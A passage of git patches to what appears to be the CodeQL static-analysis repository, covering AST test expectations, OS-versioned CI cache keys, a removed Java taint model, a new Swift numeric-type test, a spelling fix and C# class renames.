| [BlockStmt] { i ... } } | semmle.label | 5 | | tst.ts:412:3:416:3 | [FunctionDeclStmt] functio ... } } | tst.ts:412:45:416:3 | [BlockStmt] { i ... } } | semmle.order | 5 | -| tst.ts:412:21:412:25 | [SimpleParameter] color | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | semmle.label | 0 | -| tst.ts:412:21:412:25 | [SimpleParameter] color | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | semmle.order | 0 | +| tst.ts:412:21:412:25 | [SimpleParameter] color | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | semmle.label | -2 | +| tst.ts:412:21:412:25 | [SimpleParameter] color | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | semmle.order | -2 | | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | tst.ts:412:28:412:33 | [LocalTypeAccess] RGBObj | semmle.label | 1 | | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | tst.ts:412:28:412:33 | [LocalTypeAccess] RGBObj | semmle.order | 1 | | tst.ts:412:28:412:42 | [UnionTypeExpr] RGBObj \| HSVObj | tst.ts:412:37:412:42 | [LocalTypeAccess] HSVObj | semmle.label | 2 | @@ -4485,8 +4485,8 @@ edges | tst.ts:422:5:424:5 | [FunctionExpr] constru ... ; } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:422:5:424:5 | [FunctionExpr] constru ... ; } | tst.ts:422:31:424:5 | [BlockStmt] { ... ; } | semmle.label | 5 | | tst.ts:422:5:424:5 | [FunctionExpr] constru ... ; } | tst.ts:422:31:424:5 | [BlockStmt] { ... ; } | semmle.order | 5 | -| tst.ts:422:17:422:20 | [SimpleParameter] name | tst.ts:422:23:422:28 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:422:17:422:20 | [SimpleParameter] name | tst.ts:422:23:422:28 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:422:17:422:20 | [SimpleParameter] name | tst.ts:422:23:422:28 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:422:17:422:20 | [SimpleParameter] name | tst.ts:422:23:422:28 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:422:31:424:5 | [BlockStmt] { ... ; } | tst.ts:423:7:423:23 | [ExprStmt] this.name = name; | semmle.label | 1 | | tst.ts:422:31:424:5 | [BlockStmt] { ... ; } | tst.ts:423:7:423:23 | [ExprStmt] this.name = name; | semmle.order | 1 | | tst.ts:423:7:423:15 | [DotExpr] this.name | tst.ts:423:7:423:10 | [ThisExpr] this | semmle.label | 1 | @@ -4663,8 +4663,8 @@ edges | type_alias.ts:14:9:14:32 | [FunctionExpr] [proper ... ]: Json | type_alias.ts:14:29:14:32 | [LocalTypeAccess] Json | semmle.order | 4 | | type_alias.ts:14:9:14:32 | [IndexSignature] [proper ... ]: Json | type_alias.ts:14:9:14:32 | [FunctionExpr] [proper ... ]: Json | semmle.label | 1 | | type_alias.ts:14:9:14:32 | [IndexSignature] [proper ... ]: Json | type_alias.ts:14:9:14:32 | [FunctionExpr] [proper ... ]: Json | semmle.order | 1 | -| type_alias.ts:14:10:14:17 | [SimpleParameter] property | type_alias.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.label | 0 | -| type_alias.ts:14:10:14:17 | [SimpleParameter] property | type_alias.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.order | 0 | +| type_alias.ts:14:10:14:17 | [SimpleParameter] property | type_alias.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.label | -2 | +| type_alias.ts:14:10:14:17 | [SimpleParameter] property | type_alias.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.order | -2 | | type_alias.ts:15:7:15:12 | [ArrayTypeExpr] Json[] | type_alias.ts:15:7:15:10 | [LocalTypeAccess] Json | semmle.label | 1 | | type_alias.ts:15:7:15:12 | [ArrayTypeExpr] Json[] | type_alias.ts:15:7:15:10 | [LocalTypeAccess] Json | semmle.order | 1 | | type_alias.ts:17:1:17:15 | [DeclStmt] var json = ... | type_alias.ts:17:5:17:14 | [VariableDeclarator] json: Json | semmle.label | 1 | @@ -4695,8 +4695,8 @@ edges | type_alias.ts:21:18:21:35 | [FunctionExpr] [key: string]: any | type_alias.ts:21:33:21:35 | [KeywordTypeExpr] any | semmle.order | 4 | | type_alias.ts:21:18:21:35 | [IndexSignature] [key: string]: any | type_alias.ts:21:18:21:35 | [FunctionExpr] [key: string]: any | semmle.label | 1 | | type_alias.ts:21:18:21:35 | [IndexSignature] [key: string]: any | type_alias.ts:21:18:21:35 | [FunctionExpr] [key: string]: any | semmle.order | 1 | -| type_alias.ts:21:19:21:21 | [SimpleParameter] key | type_alias.ts:21:24:21:29 | [KeywordTypeExpr] string | semmle.label | 0 | -| type_alias.ts:21:19:21:21 | [SimpleParameter] key | type_alias.ts:21:24:21:29 | [KeywordTypeExpr] string | semmle.order | 0 | +| type_alias.ts:21:19:21:21 | [SimpleParameter] key | type_alias.ts:21:24:21:29 | [KeywordTypeExpr] string | semmle.label | -2 | +| type_alias.ts:21:19:21:21 | [SimpleParameter] key | type_alias.ts:21:24:21:29 | [KeywordTypeExpr] string | semmle.order | -2 | | type_alias.ts:21:40:21:55 | [RestTypeExpr] ...VirtualNode[] | type_alias.ts:21:43:21:55 | [ArrayTypeExpr] VirtualNode[] | semmle.label | 1 | | type_alias.ts:21:40:21:55 | [RestTypeExpr] ...VirtualNode[] | type_alias.ts:21:43:21:55 | [ArrayTypeExpr] VirtualNode[] | semmle.order | 1 | | type_alias.ts:21:43:21:55 | [ArrayTypeExpr] VirtualNode[] | type_alias.ts:21:43:21:53 | [LocalTypeAccess] VirtualNode | semmle.label | 1 | From e29e077a030d70b5f1dfa89a83572a738d241048 Mon Sep 17 00:00:00 2001 From: Arthur Baars Date: Thu, 12 Jan 2023 13:25:37 +0100 Subject: [PATCH 214/381] Ruby/QL4QL: include OS version in cache keys --- .github/actions/os-version/action.yml | 32 +++++++++++++++++++ .github/workflows/ql-for-ql-build.yml | 10 +++--- .../workflows/ql-for-ql-dataset_measure.yml | 4 ++- .github/workflows/ql-for-ql-tests.yml | 4 ++- .github/workflows/ruby-build.yml | 6 ++-- ruby/actions/create-extractor-pack/action.yml | 6 ++-- 6 files changed, 52 insertions(+), 10 deletions(-) create mode 100644 .github/actions/os-version/action.yml diff --git a/.github/actions/os-version/action.yml b/.github/actions/os-version/action.yml new file mode 100644 index 00000000000..31a33b7a937 --- /dev/null +++ b/.github/actions/os-version/action.yml @@ -0,0 +1,32 @@ +name: OS Version +description: Get OS version. + +outputs: + version: + description: "OS version" + value: ${{ steps.version.outputs.version }} + +runs: + using: composite + steps: + - if: runner.os == 'Linux' + shell: bash + run: | + . /etc/os-release + echo "VERSION=${NAME} ${VERSION}" >> $GITHUB_ENV + - if: runner.os == 'Windows' + shell: powershell + run: | + $objects = systeminfo.exe /FO CSV | ConvertFrom-Csv + "VERSION=$($objects.'OS Name') $($objects.'OS Version')" >> $env:GITHUB_ENV + - if: runner.os == 'macOS' + shell: bash + run: | + echo "VERSION=$(sw_vers -productName) $(sw_vers -productVersion)" >> $GITHUB_ENV + - name: Emit OS version + id: version + shell: bash + run: | + echo "$VERSION" + echo "version=${VERSION}" >> $GITHUB_OUTPUT + diff --git a/.github/workflows/ql-for-ql-build.yml b/.github/workflows/ql-for-ql-build.yml index 29b8bc16300..553fd7bb51c 100644 --- a/.github/workflows/ql-for-ql-build.yml +++ b/.github/workflows/ql-for-ql-build.yml @@ -38,12 +38,14 @@ jobs: shell: bash env: CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} + - uses: ./.github/actions/os-version + id: os_version - name: Cache entire pack id: cache-pack uses: actions/cache@v3 with: path: ${{ runner.temp }}/pack - key: ${{ runner.os }}-pack-${{ hashFiles('ql/**/Cargo.lock') }}-${{ hashFiles('ql/**/*.rs') }}-${{ hashFiles('ql/**/*.ql*') }}-${{ hashFiles('ql/**/qlpack.yml') }}-${{ hashFiles('ql/ql/src/ql.dbscheme*') }}-${{ steps.get-codeql-version.outputs.version }}--${{ hashFiles('.github/workflows/ql-for-ql-build.yml') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-pack-${{ hashFiles('ql/**/Cargo.lock') }}-${{ hashFiles('ql/**/*.rs') }}-${{ hashFiles('ql/**/*.ql*') }}-${{ hashFiles('ql/**/qlpack.yml') }}-${{ hashFiles('ql/ql/src/ql.dbscheme*') }}-${{ steps.get-codeql-version.outputs.version }}--${{ hashFiles('.github/workflows/ql-for-ql-build.yml') }} - name: Cache queries if: steps.cache-pack.outputs.cache-hit != 'true' id: cache-queries @@ -77,7 +79,7 @@ jobs: ql/target/release/ql-autobuilder.exe ql/target/release/ql-extractor ql/target/release/ql-extractor.exe - key: ${{ runner.os }}-extractor-${{ hashFiles('ql/**/Cargo.lock') }}-${{ hashFiles('ql/**/*.rs') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-extractor-${{ hashFiles('ql/**/Cargo.lock') }}-${{ hashFiles('ql/**/*.rs') }} - name: Cache cargo if: steps.cache-extractor.outputs.cache-hit != 'true' && steps.cache-pack.outputs.cache-hit != 'true' uses: actions/cache@v3 @@ -86,7 +88,7 @@ jobs: ~/.cargo/registry ~/.cargo/git ql/target - key: ${{ runner.os }}-rust-cargo-${{ hashFiles('ql/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-rust-cargo-${{ hashFiles('ql/**/Cargo.lock') }} - name: Check formatting if: steps.cache-extractor.outputs.cache-hit != 'true' && steps.cache-pack.outputs.cache-hit != 'true' run: cd ql; cargo fmt --all -- --check @@ -172,4 +174,4 @@ jobs: with: name: ql-for-ql-langs path: split-sarif - retention-days: 1 \ No newline at end of file + retention-days: 1 diff --git a/.github/workflows/ql-for-ql-dataset_measure.yml b/.github/workflows/ql-for-ql-dataset_measure.yml index 41f95a686ba..90614711d0c 100644 --- a/.github/workflows/ql-for-ql-dataset_measure.yml +++ b/.github/workflows/ql-for-ql-dataset_measure.yml @@ -28,13 +28,15 @@ jobs: uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 with: languages: javascript # does not matter + - uses: ./.github/actions/os-version + id: os_version - uses: actions/cache@v3 with: path: | ~/.cargo/registry ~/.cargo/git ql/target - key: ${{ runner.os }}-qltest-cargo-${{ hashFiles('ql/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/**/Cargo.lock') }} - name: Build Extractor run: cd ql; env "PATH=$PATH:`dirname ${CODEQL}`" ./scripts/create-extractor-pack.sh env: diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index ce7963e8f79..fd8001de8c7 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -25,13 +25,15 @@ jobs: uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 with: languages: javascript # does not matter + - uses: ./.github/actions/os-version + id: os_version - uses: actions/cache@v3 with: path: | ~/.cargo/registry ~/.cargo/git ql/target - key: ${{ runner.os }}-qltest-cargo-${{ hashFiles('ql/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/**/Cargo.lock') }} - name: Build extractor run: | cd ql; diff --git a/.github/workflows/ruby-build.yml b/.github/workflows/ruby-build.yml index e272f2ba319..e371ffcae27 100644 --- a/.github/workflows/ruby-build.yml +++ b/.github/workflows/ruby-build.yml @@ -48,6 +48,8 @@ jobs: run: | brew install gnu-tar echo "/usr/local/opt/gnu-tar/libexec/gnubin" >> $GITHUB_PATH + - uses: ./.github/actions/os-version + id: os_version - name: Cache entire extractor uses: actions/cache@v3 id: cache-extractor @@ -58,7 +60,7 @@ jobs: ruby/target/release/ruby-extractor ruby/target/release/ruby-extractor.exe ruby/ql/lib/codeql/ruby/ast/internal/TreeSitter.qll - key: ${{ runner.os }}-ruby-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }}--${{ hashFiles('ruby/**/*.rs') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-ruby-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }}--${{ hashFiles('ruby/**/*.rs') }} - uses: actions/cache@v3 if: steps.cache-extractor.outputs.cache-hit != 'true' with: @@ -66,7 +68,7 @@ jobs: ~/.cargo/registry ~/.cargo/git ruby/target - key: ${{ runner.os }}-ruby-rust-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-ruby-rust-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }} - name: Check formatting if: steps.cache-extractor.outputs.cache-hit != 'true' run: cargo fmt --all -- --check diff --git a/ruby/actions/create-extractor-pack/action.yml b/ruby/actions/create-extractor-pack/action.yml index 667158c264c..7062dd0cfcd 100644 --- a/ruby/actions/create-extractor-pack/action.yml +++ b/ruby/actions/create-extractor-pack/action.yml @@ -3,12 +3,14 @@ description: Builds the Ruby CodeQL pack runs: using: composite steps: + - uses: ./.github/actions/os-version + id: os_version - name: Cache entire extractor id: cache-extractor uses: actions/cache@v3 with: path: ruby/extractor-pack - key: ${{ runner.os }}-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }}-${{ hashFiles('ruby/**/*.rs') }}-${{ hashFiles('ruby/codeql-extractor.yml', 'ruby/downgrades', 'ruby/tools', 'ruby/ql/lib/ruby.dbscheme', 'ruby/ql/lib/ruby.dbscheme.stats') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-extractor-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }}-${{ hashFiles('ruby/**/*.rs') }}-${{ hashFiles('ruby/codeql-extractor.yml', 'ruby/downgrades', 'ruby/tools', 'ruby/ql/lib/ruby.dbscheme', 'ruby/ql/lib/ruby.dbscheme.stats') }} - name: Cache cargo uses: actions/cache@v3 if: steps.cache-extractor.outputs.cache-hit != 'true' @@ -17,7 +19,7 @@ runs: ~/.cargo/registry ~/.cargo/git ruby/target - key: ${{ runner.os }}-ruby-qltest-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-ruby-qltest-cargo-${{ hashFiles('ruby/rust-toolchain.toml', 'ruby/**/Cargo.lock') }} - name: Build Extractor if: steps.cache-extractor.outputs.cache-hit != 'true' shell: bash From e0444449c883aba3b423fc8dc5acb151ab77fe2e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 09:58:53 -0500 Subject: [PATCH 215/381] Java: remove Function.apply model --- java/ql/lib/ext/java.util.function.model.yml | 1 - java/ql/test/ext/TestModels/Test.java | 6 ------ java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 1 + java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected | 1 + 4 files changed, 2 insertions(+), 7 deletions(-) diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 9ee54700752..41d0f1f77df 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ b/java/ql/lib/ext/java.util.function.model.yml @@ -9,5 +9,4 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index c2053d67929..8560ad1e565 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -78,12 +78,6 @@ public class Test { sink(ar.get()); // $hasValueFlow // java.util.function - Function func = a -> a + ""; - sink(func.apply(source())); // $hasTaintFlow - - Function half = a -> a / 2.0; - sink(half.apply((Integer)source())); // $hasTaintFlow - Supplier sup = (Supplier)source(); sink(sup.get()); // $hasValueFlow diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index b00cfb4cad7..013d212fdcb 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -146,6 +146,7 @@ class TopJdkApi extends SummarizedCallableBase { * `java.lang.String#valueOf(Object)`: a complex case; an alias for `Object.toString`, except the dispatch is hidden * `java.lang.Throwable#printStackTrace()`: should probably not be a general step, but there might be specialised queries that care * `java.util.function.Consumer#accept(Object)`: specialized lambda flow + * `java.util.function.Function#apply(Object)`: specialized lambda flow * `java.util.stream.Collectors#joining(CharSequence)`: cannot be modeled completely without a model for `java.util.stream.Stream#collect(Collector)` as well * `java.util.stream.Collectors#toMap(Function,Function)`: specialized collectors flow * `java.util.stream.Stream#collect(Collector)`: handled separately on a case-by-case basis as it is too complex for MaD diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected index 2023810b44d..fd63ca00a53 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected @@ -1,6 +1,7 @@ | java.lang.String#valueOf(Object) | no manual model | | java.lang.Throwable#printStackTrace() | no manual model | | java.util.function.Consumer#accept(Object) | no manual model | +| java.util.function.Function#apply(Object) | no manual model | | java.util.stream.Collectors#joining(CharSequence) | no manual model | | java.util.stream.Collectors#toMap(Function,Function) | no manual model | | java.util.stream.Stream#collect(Collector) | no manual model | From 7f31c9c7e59270b09235448b05220d4a81171e5f Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 14:48:40 +0000 Subject: [PATCH 216/381] Swift: Add a test. --- .../elements/type/numerictype/numeric.swift | 32 +++++++++++++++++++ .../type/numerictype/numerictype.expected | 22 +++++++++++++ .../elements/type/numerictype/numerictype.ql | 19 +++++++++++ 3 files changed, 73 insertions(+) create mode 100644 swift/ql/test/library-tests/elements/type/numerictype/numeric.swift create mode 100644 swift/ql/test/library-tests/elements/type/numerictype/numerictype.expected create mode 100644 swift/ql/test/library-tests/elements/type/numerictype/numerictype.ql diff --git a/swift/ql/test/library-tests/elements/type/numerictype/numeric.swift b/swift/ql/test/library-tests/elements/type/numerictype/numeric.swift new file mode 100644 index 00000000000..6da917e1411 --- /dev/null +++ b/swift/ql/test/library-tests/elements/type/numerictype/numeric.swift @@ -0,0 +1,32 @@ + +typealias MyFloat = Float + +func test() { + var f1: Float + let f2 = 123.456 + let f3 = f2 + var f4: Float? + var f5: MyFloat + var f6: MyFloat? + + var d: Double + + var c: Character + + var i1: Int + let i2 = 123 + let i3 = 0xFFFF + var i4: Int8 + var i5: Int16 + var i6: Int32 + var i7: Int64 + + var u1: UInt + var u2: UInt8 + var u3: UInt16 + var u4: UInt32 + var u5: UInt64 + + var b1: Bool + let b2 = true +} diff --git a/swift/ql/test/library-tests/elements/type/numerictype/numerictype.expected b/swift/ql/test/library-tests/elements/type/numerictype/numerictype.expected new file mode 100644 index 00000000000..5670aededb8 --- /dev/null +++ b/swift/ql/test/library-tests/elements/type/numerictype/numerictype.expected @@ -0,0 +1,22 @@ +| numeric.swift:5:6:5:6 | f1 | Float | FloatingPointType, NumericType | +| numeric.swift:6:6:6:6 | f2 | Double | FloatingPointType, NumericType | +| numeric.swift:7:6:7:6 | f3 | Double | FloatingPointType, NumericType | +| numeric.swift:8:6:8:6 | f4 | Float? | | +| numeric.swift:9:6:9:6 | f5 | MyFloat | | +| numeric.swift:10:6:10:6 | f6 | MyFloat? | | +| numeric.swift:12:6:12:6 | d | Double | FloatingPointType, NumericType | +| numeric.swift:14:6:14:6 | c | Character | CharacterType | +| numeric.swift:16:6:16:6 | i1 | Int | IntegralType, NumericType | +| numeric.swift:17:6:17:6 | i2 | Int | IntegralType, NumericType | +| numeric.swift:18:6:18:6 | i3 | Int | IntegralType, NumericType | +| numeric.swift:19:6:19:6 | i4 | Int8 | IntegralType, NumericType | +| numeric.swift:20:6:20:6 | i5 | Int16 | IntegralType, NumericType | +| numeric.swift:21:6:21:6 | i6 | Int32 | IntegralType, NumericType | +| numeric.swift:22:6:22:6 | i7 | Int64 | IntegralType, NumericType | +| numeric.swift:24:6:24:6 | u1 | UInt | IntegralType, NumericType | +| numeric.swift:25:6:25:6 | u2 | UInt8 | IntegralType, NumericType | +| numeric.swift:26:6:26:6 | u3 | UInt16 | IntegralType, NumericType | +| numeric.swift:27:6:27:6 | u4 | UInt32 | IntegralType, NumericType | +| numeric.swift:28:6:28:6 | u5 | UInt64 | IntegralType, NumericType | +| numeric.swift:30:6:30:6 | b1 | Bool | BoolType | +| numeric.swift:31:6:31:6 | b2 | Bool | BoolType | diff --git a/swift/ql/test/library-tests/elements/type/numerictype/numerictype.ql b/swift/ql/test/library-tests/elements/type/numerictype/numerictype.ql new file mode 100644 index 00000000000..7f3fb4591f8 --- /dev/null +++ b/swift/ql/test/library-tests/elements/type/numerictype/numerictype.ql @@ -0,0 +1,19 @@ +import swift + +string describe(Type t) { + t instanceof FloatingPointType and result = "FloatingPointType" + or + t instanceof CharacterType and result = "CharacterType" + or + t instanceof IntegralType and result = "IntegralType" + or + t instanceof BoolType and result = "BoolType" + or + t instanceof NumericType and result = "NumericType" +} + +from VarDecl v, Type t +where + v.getLocation().getFile().getBaseName() != "" and + t = v.getType() +select v, t.toString(), concat(describe(t), ", ") From 09d8a50494ce0049daff3bc6e7d94091759b8ed4 Mon Sep 17 00:00:00 2001 From: Chris Smowton Date: Thu, 12 Jan 2023 17:46:00 +0000 Subject: [PATCH 217/381] Spelling --- java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp index c991e037791..6806527e442 100644 --- a/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp +++ b/java/ql/src/Security/CWE/CWE-502/UnsafeDeserialization.qhelp @@ -70,7 +70,7 @@ Recommendations specific to particular frameworks supported by this query:

    XML Decoder - Standard Java Library

      -
    • Secure by Defauly: No
      • +
    • Secure by Default: No
    • Recommendation: Do not use with untrusted user input.

    From a9f1c9551312d842ddd92fd34b030ac75e1ccd31 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 15:10:13 +0100 Subject: [PATCH 218/381] C#: Rename shift assignment expression classes. --- .../semmle/code/csharp/exprs/Assignment.qll | 18 ++++++++++++------ .../raw/internal/TranslatedExpr.qll | 8 ++++---- .../test/experimental/ir/ir/PrintAst.expected | 4 ++-- 3 files changed, 18 insertions(+), 12 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll b/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll index 562a4dd9cd5..ce5022c5f89 100644 --- a/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll +++ b/csharp/ql/lib/semmle/code/csharp/exprs/Assignment.qll @@ -150,8 +150,8 @@ class AssignRemExpr extends AssignArithmeticOperation, @assign_rem_expr { * operation (`AssignAndExpr`), a bitwise-or assignment * operation (`AssignOrExpr`), a bitwise exclusive-or assignment * operation (`AssignXorExpr`), a left-shift assignment - * operation (`AssignLShiftExpr`), or a right-shift assignment - * operation (`AssignRShiftExpr`). + * operation (`AssignLeftShiftExpr`), or a right-shift assignment + * operation (`AssignRightShiftExpr`). */ class AssignBitwiseOperation extends AssignOperation, @assign_bitwise_expr { } @@ -185,21 +185,27 @@ class AssignXorExpr extends AssignBitwiseOperation, @assign_xor_expr { /** * A left-shift assignment operation, for example `x <<= y`. */ -class AssignLShiftExpr extends AssignBitwiseOperation, @assign_lshift_expr { +class AssignLeftShiftExpr extends AssignBitwiseOperation, @assign_lshift_expr { override string getOperator() { result = "<<=" } - override string getAPrimaryQlClass() { result = "AssignLShiftExpr" } + override string getAPrimaryQlClass() { result = "AssignLeftShiftExpr" } } +/** DEPRECATED: Alias for AssignLeftShipExpr. */ +deprecated class AssignLShiftExpr = AssignLeftShiftExpr; + /** * A right-shift assignment operation, for example `x >>= y`. */ -class AssignRShiftExpr extends AssignBitwiseOperation, @assign_rshift_expr { +class AssignRightShiftExpr extends AssignBitwiseOperation, @assign_rshift_expr { override string getOperator() { result = ">>=" } - override string getAPrimaryQlClass() { result = "AssignRShiftExpr" } + override string getAPrimaryQlClass() { result = "AssignRightShiftExpr" } } +/** DEPRECATED: Alias for AssignRightShiftExpr. */ +deprecated class AssignRShiftExpr = AssignRightShiftExpr; + /** * An event assignment. Either an event addition (`AddEventExpr`) or an event * removal (`RemoveEventExpr`). diff --git a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll index 1bcca401565..7be1fa40ebb 100644 --- a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll @@ -1377,8 +1377,8 @@ class TranslatedAssignOperation extends TranslatedAssignment { private Type getConvertedLeftOperandType() { if - expr instanceof AssignLShiftExpr or - expr instanceof AssignRShiftExpr + expr instanceof AssignLeftShiftExpr or + expr instanceof AssignRightShiftExpr then result = this.getLeftOperand().getResultType() else // The right operand has already been converted to the type of the op. @@ -1416,9 +1416,9 @@ class TranslatedAssignOperation extends TranslatedAssignment { or expr instanceof AssignXorExpr and result instanceof Opcode::BitXor or - expr instanceof AssignLShiftExpr and result instanceof Opcode::ShiftLeft + expr instanceof AssignLeftShiftExpr and result instanceof Opcode::ShiftLeft or - expr instanceof AssignRShiftExpr and result instanceof Opcode::ShiftRight + expr instanceof AssignRightShiftExpr and result instanceof Opcode::ShiftRight } override predicate hasInstruction(Opcode opcode, InstructionTag tag, CSharpType resultType) { diff --git a/csharp/ql/test/experimental/ir/ir/PrintAst.expected b/csharp/ql/test/experimental/ir/ir/PrintAst.expected index 41b5b6daead..480b63f4241 100644 --- a/csharp/ql/test/experimental/ir/ir/PrintAst.expected +++ b/csharp/ql/test/experimental/ir/ir/PrintAst.expected @@ -152,11 +152,11 @@ assignop.cs: # 12| 0: [LocalVariableAccess] access to local variable c # 12| 1: [LocalVariableAccess] access to local variable a # 13| 7: [ExprStmt] ...; -# 13| 0: [AssignLShiftExpr] ... <<= ... +# 13| 0: [AssignLeftShiftExpr] ... <<= ... # 13| 0: [LocalVariableAccess] access to local variable c # 13| 1: [IntLiteral] 2 # 14| 8: [ExprStmt] ...; -# 14| 0: [AssignRShiftExpr] ... >>= ... +# 14| 0: [AssignRightShiftExpr] ... >>= ... # 14| 0: [LocalVariableAccess] access to local variable c # 14| 1: [IntLiteral] 2 # 15| 9: [ExprStmt] ...; From 36980bbf4221524a98d914b2e99da487ab74d87f Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Jan 2023 15:26:19 +0100 Subject: [PATCH 219/381] C#: Rename shift expression classes. --- .../code/csharp/dataflow/ModulusAnalysis.qll | 2 +- .../rangeanalysis/ModulusAnalysisSpecific.qll | 5 ++++- .../internal/rangeanalysis/RangeUtils.qll | 14 ++++++++++---- .../rangeanalysis/SignAnalysisSpecific.qll | 4 ++-- .../code/csharp/exprs/BitwiseOperation.qll | 16 +++++++++++----- .../raw/internal/TranslatedExpr.qll | 4 ++-- .../library-tests/indexers/PrintAst.expected | 14 +++++++------- 7 files changed, 37 insertions(+), 22 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/ModulusAnalysis.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/ModulusAnalysis.qll index b919d143a39..5b2a39ad6c9 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/ModulusAnalysis.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/ModulusAnalysis.qll @@ -105,7 +105,7 @@ private predicate evenlyDivisibleExpr(Expr e, int factor) { exists(ConstantIntegerExpr c, int k | k = c.getIntValue() | e.(MulExpr).getAnOperand() = c and factor = k.abs() and factor >= 2 or - e.(LShiftExpr).getRhs() = c and factor = 2.pow(k) and k > 0 + e.(LeftShiftExpr).getRhs() = c and factor = 2.pow(k) and k > 0 or e.(BitwiseAndExpr).getAnOperand() = c and factor = max(int f | andmaskFactor(k, f)) ) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll index 74aee61e690..3b7e29888d2 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll @@ -30,7 +30,10 @@ module Private { class MulExpr = RU::ExprNode::MulExpr; - class LShiftExpr = RU::ExprNode::LShiftExpr; + class LeftShiftExpr = RU::ExprNode::LeftShiftExpr; + + /** DEPRECATED: Alias for LeftShiftExpr. */ + deprecated class 